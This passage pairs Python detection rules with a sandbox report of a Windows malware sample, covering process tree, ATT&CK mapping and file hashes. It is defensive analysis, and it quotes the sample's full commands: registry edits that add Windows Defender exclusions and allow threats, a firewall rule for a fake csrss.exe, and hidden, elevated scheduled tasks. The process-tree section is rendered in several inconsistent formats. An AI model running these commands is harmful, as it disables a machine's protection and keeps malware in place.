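    return {"action": action.group(1).lower() if action else None, "name": opt("tn"), "exe": exe,
            "elevated": bool(re.search(r'/RL\s+HIGHEST|/RU\s+"?SYSTEM\b', cmdline, re.I))}


def analyze(events):
    """Run every rule over (pid, image, cmdline) events; returns (pid, rule, detail) tuples."""
    findings, task_actions = [], {}
    for pid, image, cmd in events:
        image = basename(image).lower()
        for change in defender_policy_changes(cmd):
            findings.append((pid, "defender_policy", describe(*change)))
        if image == "forfiles.exe" and re.search(r"\s/c\s", cmd, re.I):
            findings.append((pid, "proxy_exec", "forfiles /c used to launch a child command"))
        if script := decode_encoded_command(cmd):
            findings.append((pid, "encoded_powershell", script))
        prog = firewall_allow_program(cmd)
        if prog and basename(prog).lower() in SYSTEM_PROCESS_NAMES and not is_trusted_path(prog):
            findings.append((pid, "masquerade_firewall_allow", prog))
        task = scheduled_task(cmd)
        if task and task["name"]:
            if task["action"] == "create" and task["elevated"] and not is_trusted_path(task["exe"] or ""):
                findings.append((pid, "elevated_task", f'{task["name"]} -> {task["exe"]}'))
            seen = task_actions.setdefault(task["name"].lower(), set())
            seen.add(task["action"])
            if seen >= {"create", "run", "delete"}:  # task used once and covered up
                findings.append((pid, "task_create_run_delete", task["name"]))
    return findings


# Constructed from the process tree above: (PID, image path, command line as recorded).
EVENTS = [
    (2668, r"C:\Windows\SysWOW64\forfiles.exe", r'"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"'),
    (5920, r"c:\windows\SysWOW64\reg.exe", r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32'),
    (5164, r"C:\Windows\SysWOW64\schtasks.exe", r'schtasks /CREATE /TN "gXZzXSySt" /SC once /ST 10:21:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="'),
    (3404, r"C:\Windows\SysWOW64\schtasks.exe", r'schtasks /run /I /tn "gXZzXSySt"'),
    (1000, r"C:\Windows\SysWOW64\schtasks.exe", r'schtasks /DELETE /F /TN "gXZzXSySt"'),
    (4836, r"C:\Windows\SysWOW64\schtasks.exe", r'schtasks /CREATE /TN "beMXFFiCiqlBKkvOrW" /SC once /ST 11:58:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\hRDMMfa.exe\" Fm /zesite_idOIT 525403 /S" /V1 /F'),
    (5832, r"C:\Windows\system32\netsh.exe", r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes'),
    (2808, r"C:\Windows\SYSTEM32\schtasks.exe", r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F'),
    (5860, r"C:\Windows\SysWOW64\reg.exe", r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32'),
    (5076, r"C:\Windows\system32\gpupdate.exe", r'"C:\Windows\system32\gpupdate.exe" /force'),
]
```

`analyze(EVENTS)` yields ten findings across six rules and none for the gpupdate.exe event. The Defender rule deliberately parses the outermost forfiles command line rather than waiting for the reg.exe children, so it fires even where the child processes are not logged; the task rule keys on the task name across events, which is what catches the create/run/delete pattern that leaves no task behind for a later inventory to find.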
[1] C:\Users\Admin\AppData\Local\Temp\7zS11BE.tmp\Install.exe  (PID 916)
    cmd: .\Install.exe
    - Executes dropped EXE
[1] C:\Windows\SysWOW64\WerFault.exe  (PID 4972)
    cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5260 -s 340
    - Program crash
[1] C:\Users\Admin\AppData\Local\Temp\is-S0TH8.tmp\evl5AhAqx92wdfRi532WmaQN.tmp  (PID 6044)
    cmd: "C:\Users\Admin\AppData\Local\Temp\is-S0TH8.tmp\evl5AhAqx92wdfRi532WmaQN.tmp" /SL5="$130200,4078676,54272,C:\Users\Admin\Documents\GuardFox\evl5AhAqx92wdfRi532WmaQN.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
[1] C:\Windows\SysWOW64\WerFault.exe  (PID 5836)
    cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5260 -ip 5260
[1] C:\Windows\system32\svchost.exe  (PID 2104)
    cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
[1] C:\Windows\SysWOW64\WerFault.exe  (PID 5424)
    cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5204 -ip 5204
[1] C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 6032)
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8b4cb9758,0x7ff8b4cb9768,0x7ff8b4cb9778
[1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  (PID 3480)
    cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  [2] C:\Windows\system32\gpupdate.exe  (PID 5076)
      cmd: "C:\Windows\system32\gpupdate.exe" /force
[1] C:\Windows\SysWOW64\WerFault.exe  (PID 1416)
    cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1740 -ip 1740
[1] C:\Windows\SysWOW64\WerFault.exe  (PID 5008)
    cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 956 -ip 956
[1] C:\Windows\system32\svchost.exe  (PID 5024)
    cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
[1] C:\Windows\system32\gpscript.exe  (PID 2108)
    cmd: gpscript.exe /RefreshSystemParam
[1] C:\Windows\windefender.exe  (PID 5064)
    cmd: C:\Windows\windefender.exe
[1] C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\hRDMMfa.exe  (PID 2604)
    cmd: C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\hRDMMfa.exe Fm /zesite_idOIT 525403 /S
  [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 5812)
      cmd: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
    [3] C:\Windows\SysWOW64\cmd.exe  (PID 5216)
        cmd: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe  (PID 5860)
          cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    [3] C:\Windows\SysWOW64\reg.exe, one process per REG ADD, each with the command line
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v <threat ID> /t REG_SZ /d 6 /reg:<view>
        threat ID     view   PID
        225451        64     2936
        256596        32     3508
        256596        64     5676
        242872        32     4296
        242872        64     5456
        2147749373    32     1488
        2147749373    64     2864
        2147807942    32     2588
        2147807942    64     1748
        2147735735    32     5608
        2147735735    64     5592
        2147737010    32     6060
        2147737010    64     3468
        2147737007    32     4388
        2147737007    64     2064   (Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken)
        2147737503    32     1824
        2147737503    64     3636
        2147735503    32     4492
        2147735503    64     1384
        2147749376    32     5268
        2147749376    64     5476
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5720
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:6032
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:2344
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:996
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:1708
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:5928
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [level 2, PID 5524]
    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IiRTlIkCOmnQC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IiRTlIkCOmnQC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LoqUitafHMeQMjVNAtR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LoqUitafHMeQMjVNAtR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NXJhSTlNVQUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NXJhSTlNVQUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mePNjhakU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mePNjhakU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zzVcilLLhiPU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zzVcilLLhiPU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LSnoZghYDRjXCXVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LSnoZghYDRjXCXVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mMqUxMafZteBAeom\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mMqUxMafZteBAeom\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe [level 3, PID 4756]
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IiRTlIkCOmnQC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe [level 4, PID 5504]
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IiRTlIkCOmnQC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 868]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IiRTlIkCOmnQC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 2540]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LoqUitafHMeQMjVNAtR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 4028]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LoqUitafHMeQMjVNAtR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 5212]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NXJhSTlNVQUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 5696]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NXJhSTlNVQUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 2948]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mePNjhakU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe [level 3, PID 3648]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mePNjhakU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe [level 3, PID 1684]
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zzVcilLLhiPU2" /t REG_DWORD /d 0 /reg:32
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- File and Directory Permissions Modification (1)
- Impair Defenses (1)
  - Disable or Modify System Firewall (1)
- Modify Registry (1)
- Virtualization/Sandbox Evasion (2)
Downloads
-
Filesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
1024KB
MD53e0c5d0dfe8abc71d8609b02dba39169
SHA1038e1207a7dd0c13f64204d9466fbafa8fbc08cb
SHA2567fd2d86e40a224c67a783dfc6353ce20c559fe4cb6a899b2875c0ec8d97d0f41
SHA512cb58530108a7fd9b0e4db1814c3e1cd775daa3251aa3f6cf4015f3cdcfba09768273b3fae6f64b0ee6719d8fd17122910d3821aa938b161a5954371ecc1c625b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD5088fd337c5dd20af88887c935787b5b3
SHA175a1afbcc3c286b59124fa9c2499a17f5dfb456c
SHA2566adb2c40431531065c4376a04f96964fd0645c2dfbe0edf8785f8bfad55fd3d7
SHA5123d0007d5c7f59ff096639a9c4f892d12a8e0c5bf7ea1718238313014b69aef423b7c6095e51d91b8e38f4018e135a2d035ab806bb22315c389b07969ed17848f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize724B
MD58202a1cd02e7d69597995cabbe881a12
SHA18858d9d934b7aa9330ee73de6c476acf19929ff6
SHA25658f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA51297ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD5ae0194c18f64dd63140ce1dd830abe83
SHA10d35be588c5bb0b82a7d2c26ade06ffd3d92a96a
SHA2566b45323af05812cf90f205964faff55537782ebf4885870a6a9f93902dd05f3d
SHA51217f300e8f232dab6cf7fac324da92ae121e1dc1a1b9562aac362f2d4c82ffde7047a791a3defa3649ccdc7e68eec5cd6b0027dd6d08aebece762050de724c2a2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize392B
MD5c5e4fe4ee25763a7d5df49025ccbe6f6
SHA10e35003c8839ac598f338584559b8213025e10d5
SHA25615fe55ea61b6aafa1b21cc52b88bc0b4467ddb2336242ec2ae3d66a7696ebb77
SHA512da30fd6c020084562feeca68a62292727a6d57511ac29fc4c9c834cefcb91ff9895eabcc9030da77e035a7d5a3e471b1865e465ecffd5666462353692e0aa778
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\_metadata\verified_contents.json
Filesize3KB
MD5f7f0462b05d4eea341c565ccd96a8b63
SHA115ed215063cfec11b5ab937258ebe2617295e651
SHA25640a0de2bcceb97b08a8804ffd7d348dac07e15bce3d042fe2c7a315ea656f73f
SHA512bd905485f5963c737ef26ac05118e4a32a85365cbfc05d7cb465644e321a3930e0458a8e5801e7572cc3456fbcf836750db7dc6a088ff2f4fb4d1a08be551abe
-
Filesize
55KB
MD556ad05be3bda3d911af8fed7b8c66949
SHA1ac65e8b3b3a80b1d99d556aac45a0f361f439130
SHA256c39b724f1c4776b68ce3940e0481490d25d18f8924d20ac083a28a3378b06aeb
SHA512449e7c27d418fb9daaae0194e065fe873ab42e8d7da03771baa5864725c49d2a685e8ef8418398619ccaa51ae705ed86885c16c40e3a96eb0b6b38f3d5f8cdb0
-
Filesize
832KB
MD598781677699674166d2c1b73d747caf7
SHA13c2bf57e267f2ceb0cc5acde32b4616e9bec9548
SHA2569137927b37f1b21892f496f617b8fb3f39dae8022f47a0dee6da1e01603db693
SHA512b62bdd84e179353fd1fb6e8befa900d50308315d19db8d0210bc0fb93a7e7aa418c8896591e21199c5b6ef5ab0b5f31a31e24a020077a6d9f85794796821e4d3
-
Filesize
64KB
MD549777d4a2460c1aae09d6d8bf992a9a3
SHA1b4dc4ca1c3581f77205c5cbe8bb419b9bb6477af
SHA2560e08fe63fd7ad7b9ebafd375ce8899979a555ac4283ec35e192c3eb19ab3b391
SHA5122007e0295e9225b40eaed2185911a0280512f48494f0562984b8651d8ee53ed72b25ac986e8f45abf6c2dc25c87cce43ece0822a8c4260661cfb9154aa34ee8b
-
Filesize
1024KB
MD5d903645f12f39c3f328bf5d6fcad0679
SHA1dc065e1ae8b4a76e1c579bf0c63fe38d47217c6d
SHA256676ea2a7fa92bbd88238ac9dd7d3f8650eade14ae545f6b3bd0becc5cc62a53c
SHA51218ed46a506851d09324f8ff2ce1e133a9ccd44574ee29101a28479a25be4244e07de45b699dbc36592355afaba68ecfbb1b994da778d4540b6faf3e90cc72d4f
-
Filesize
1KB
MD5def65711d78669d7f8e69313be4acf2e
SHA16522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA51205b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7
-
Filesize
64KB
MD558cab5bf52fb504b3f59588688c0311d
SHA194e01c814e4c7a80e4c4a74299280e59ee359973
SHA2560bf67a79e2359d3c3cc25d168146f2a1a6c463d842f2d4b263628216ed5f6540
SHA512dbce20d0887744762357aec164583fe5943d168ac025f8a1c800b201cb22f1208d435e5f5cd06243e4776cd3cf53596f078e74b95b6c600e22499923512abce8
-
Filesize
1.9MB
MD5ab4755fb5abc1dbeb69e8777a2deaba7
SHA1c7bcf378c650ef7336cba09d48b2f538fc0e2f19
SHA256563f61b0c60bc906aa83799b688b1ef5cd5b6426022648a3273cb46687973dac
